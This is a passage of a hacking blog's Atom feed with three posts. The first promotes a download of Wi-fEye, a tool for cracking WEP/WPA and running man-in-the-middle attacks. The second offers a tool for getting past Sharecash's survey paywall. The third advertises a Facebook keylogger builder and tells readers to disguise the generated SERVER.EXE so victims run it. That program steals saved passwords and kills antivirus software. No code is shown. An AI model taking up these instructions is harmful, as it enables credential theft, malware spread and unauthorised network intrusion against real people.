width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-1757729094156032672</id><published>2013-01-04T11:15:00.001-08:00</published><updated>2013-09-07T02:20:44.066-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack Wifi"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Password Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Security"/><title type='text'>WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
I have posted previously about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html&quot;&gt;Wifi Hacking Tools&lt;/a&gt; and also &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html&quot;&gt;How To Hack Wifi Using Backtrack 5&lt;/a&gt;. This is posted for those who can&#39;t understand above methods clearly they can easily use this tool.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
&lt;b&gt;Wi-fEye&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;is designed to help with network penetration testing,&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;b&gt;Wi-fEye&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;will
  allow you to perform a number of powerful attacks Automatically, all  
you have to do is to lunch Wi-fEye, choose which attack to perform,  
select your target and let Wi-fEye do the magic !!.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;b&gt;Wi-fEye is divided to four main menus:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ol style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;
&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;Cracking menu: This menu will allow you to:&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;ul style=&quot;color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;&quot;&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Enable monitor mode&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;View avalale Wireless Networks&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Launch Airodump-ng on a specific AP&lt;/li&gt;
&lt;li style=&quot;border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;WEP cracking: this will allow you to perform the following attacks automatically:&lt;/li&gt;
&lt;/ul&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Interactive packet replay.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Fake Authentication Attack.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Korek Chopchop Attack.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Fragmentation Attack.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Hirte Attack (cfrag attack).&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Wesside-ng.&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;&quot;&gt;
&lt;li style=&quot;border-style: none; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;&lt;b&gt;WPA Cracking: This contains the following attacks:&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Wordlist Attack&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #444444; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;- Rouge AP Attack.&lt;/span&gt;&lt;b style=&quot;color: #444444; font-size: 13px;&quot;&gt;&lt;br /&gt;
&lt;/b&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;color: #444444; font-size: 13px; white-space: pre;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;color: #444444; font-size: 13px;&quot;&gt;2. Mapping: this menu will allow you to do the following:&lt;/b&gt;&lt;br /&gt;
&lt;ul style=&quot;color: #444444; font-size: 13px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;&quot;&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Scan the network and view the connected hosts.&lt;/li&gt;
&lt;li style=&quot;border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Use Nmap Automatically.&lt;/li&gt;
&lt;/ul&gt;
&lt;span class=&quot;Apple-tab-span&quot; style=&quot;color: #444444; font-size: 13px; white-space: pre;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;color: #444444; font-size: 13px;&quot;&gt;3. MITM: this menu will allow you to do the following Automatically:&lt;/b&gt;&lt;br /&gt;
&lt;ul style=&quot;color: #444444; font-size: 13px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;&quot;&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Enable IP forwarding.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;ARP Spoof.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Launch ettercap (Text mode).&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Sniff SSL/HTTPS traffic.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Sniff URLs and send them to browser.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Sniff messengers from instant messengers.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Sniff images.&lt;/li&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;DNS Spoof.&lt;/li&gt;
&lt;li style=&quot;border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;HTTP Session Hijacking (using Hamster).&lt;/li&gt;
&lt;/ul&gt;
&lt;span class=&quot;Apple-tab-span&quot; style=&quot;color: #444444; font-size: 13px; white-space: pre;&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;color: #444444; font-size: 13px;&quot;&gt;4. Others: this menu will allow you to o the following automatically:&lt;/b&gt;&lt;br /&gt;
&lt;ul style=&quot;color: #444444; font-size: 13px; line-height: 1.4; margin: 0.5em 0px; padding: 0px 2.5em;&quot;&gt;
&lt;li style=&quot;border-bottom-color: transparent; border-bottom-width: 1px; border-style: none; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Change MAC Address.&lt;/li&gt;
&lt;li style=&quot;border-style: none; border-top-color: rgb(238, 238, 238); border-top-width: 1px; margin: 0px 0px 0.25em; padding: 0.25em 0px;&quot;&gt;Hijack software updates (using Evilgrade).&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;color: #444444; font-size: 13px;&quot;&gt;
&lt;b style=&quot;color: #3778cd; text-decoration: none;&quot;&gt;&lt;a href=&quot;http://wi-feye.za1d.com/Download.html&quot; style=&quot;color: #3778cd; text-decoration: none;&quot;&gt;DOWNLOAD HERE&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you can&#39;t succeed using above method then you can also try&lt;br /&gt;
&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html&quot; style=&quot;border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; margin: 0px 10px 0px 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Hack Wifi Password In Windows&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html&quot; style=&quot;border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; margin: 0px 10px 0px 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Wifi Password Hack&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-hack-into-computers-through-wifi.html&quot; style=&quot;border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;How To Hack Into Computers Through WiFi&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/1757729094156032672/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1757729094156032672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1757729094156032672'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html' title='WEP Password Cracker: Wireless Network Hacking | Download Wi-fEye'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-8672078051560921467</id><published>2012-12-28T10:42:00.002-08:00</published><updated>2013-09-10T03:24:14.746-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="download hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Download without surveys"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking sharecash"/><category scheme="http://www.blogger.com/atom/ns#" term="sharecash downloader"/><category scheme="http://www.blogger.com/atom/ns#" term="sharecash downloader without surveys"/><category scheme="http://www.blogger.com/atom/ns#" term="sharecash hacks"/><title type='text'>Sharecash Downloader V10 </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;In my previous posts i have posted Download From &lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/10/download-from-sharecash-without-doing.html&quot;&gt;Sharecash Without Doing Surveys&lt;/a&gt; now i have posted another one Enjoy.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;b&gt;How to use it:&lt;br /&gt;
&lt;br /&gt;
1. Type in the $harecash link you want to download in the textbox.&lt;br /&gt;
&lt;br /&gt;
2. Choose what kind of background your link you want to download has (you can see the examples).&lt;br /&gt;
&lt;br /&gt;
3. Press &quot;Navigate to ShareCa$h Link&quot; button.&lt;br /&gt;
&lt;br /&gt;
4. Wait for 30 seconds - 1 minute. Depends on how fast your Internet speed is.&lt;br /&gt;
&lt;br /&gt;
5. Click &quot;Download&quot;.&lt;br /&gt;
&lt;br /&gt;
Screenshot:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; height=&quot;153&quot; src=&quot;http://sharecashdownloader.info/wp-content/uploads/2012/02/sharecash-downloader.jpg&quot; width=&quot;320&quot; /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://hotfile.com/dl/107010527/dd024e9/ShareeCashDownloaderV10.rar&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
Any Problem Then Tell Me.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
If the above posts does not work on your PC then you can also try this.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/10/download-from-sharecash-without-doing.html&quot; style=&quot;font-family: Verdana, Arial, sans-serif; font-size: small; line-height: 18px;&quot;&gt;Second Method To Download From Sharecash&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/8672078051560921467/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/sharecash-downloader-v10.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/8672078051560921467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/8672078051560921467'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/sharecash-downloader-v10.html' title='Sharecash Downloader V10 '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-6535044698982791925</id><published>2012-12-28T10:37:00.000-08:00</published><updated>2013-07-31T04:36:39.864-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Articles"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="How-To Guides"/><title type='text'>Download Facebook Hacker V1.0 A Keylogging Software </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Previously i have posted &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/get-someones-ip-address-with-their.html&quot;&gt;How To Get Someone IP Using Facebook&lt;/a&gt; and also &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/post-facebook-status-with-someone-elses.html&quot;&gt;How To Post Facebook Status From Someone Else Account&lt;/a&gt; and very best one &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/get-unlimited-fb-page-likes-2013.html&quot;&gt;How To Get Unlimited Like For Your Facebook Pages&lt;/a&gt;. Today i have decided to post about a Facebook &lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Keylogging&quot;&gt;Keylogger&lt;/a&gt;. Don&#39;t know what&amp;nbsp;&lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Keylogging&quot;&gt;Keylogg&lt;span id=&quot;goog_1267713741&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_1267713742&quot;&gt;&lt;/span&gt;er&lt;/a&gt; do just read here what is &lt;a href=&quot;http://hackerx-malik.blogspot.com/search/label/Keylogging&quot;&gt;Keylogger&lt;/a&gt; and how it works then apply the trick below.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7xUMnW7l6oSJhS6T3VNb79RetB99QyXGg43_J3vJQWpi1dMvF2pAlwP6l4eIg6oeEq6Ek-BWOqnwOF4npqPE20k3H4VR4pAsPWyY-O3UZvWer-et3ryuZiY3vF9yheR9WVplBHQXSYms/s400/Fig2.jpg&quot; width=&quot;355&quot; /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
This
  tool is extremely easy to connect and use. All you have to do is  give
  an email address and a password where the stolen information is to   
deliver. Can’t be easier than that.&lt;/div&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/post-create.g?blogID=1986317120098986075&quot; name=&quot;more&quot;&gt;&lt;/a&gt;Just type in the email address and password and then click on the build button. A new &lt;b&gt;“SERVER.EXE&lt;/b&gt;”
   file will be created and most of the work is already done. Now the 
big   part comes. Just send this file to the victim. Rename it, change 
the   icon and make it more presentable so that the victim opens it for 
sure.&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
As soon as the victim opens the file,   
Server.exe will get all the passwords saved and facebook account   
credentials and will give them to you. To avoid detection, the facebook 
  Hacker will also look for all the processes related to a security 
suite   and kill them upon detection. The most important thing this 
software   does is it kills all the security suite detecting it.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQN3tjPGzl36S0GgwaNsmT99UIQbCLpCC8fZPjd8guglXWU9b2faMG_SaRGm6MQH5bc2Eg0aW0zO2-zYak8tbYB14jNZCh20EJFQL3Cy_opuOcnYs1CAZeIbKXfq6sVOee3qjiR-FpTME/s1600/Fig5.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQN3tjPGzl36S0GgwaNsmT99UIQbCLpCC8fZPjd8guglXWU9b2faMG_SaRGm6MQH5bc2Eg0aW0zO2-zYak8tbYB14jNZCh20EJFQL3Cy_opuOcnYs1CAZeIbKXfq6sVOee3qjiR-FpTME/s400/Fig5.jpg&quot; width=&quot;350&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
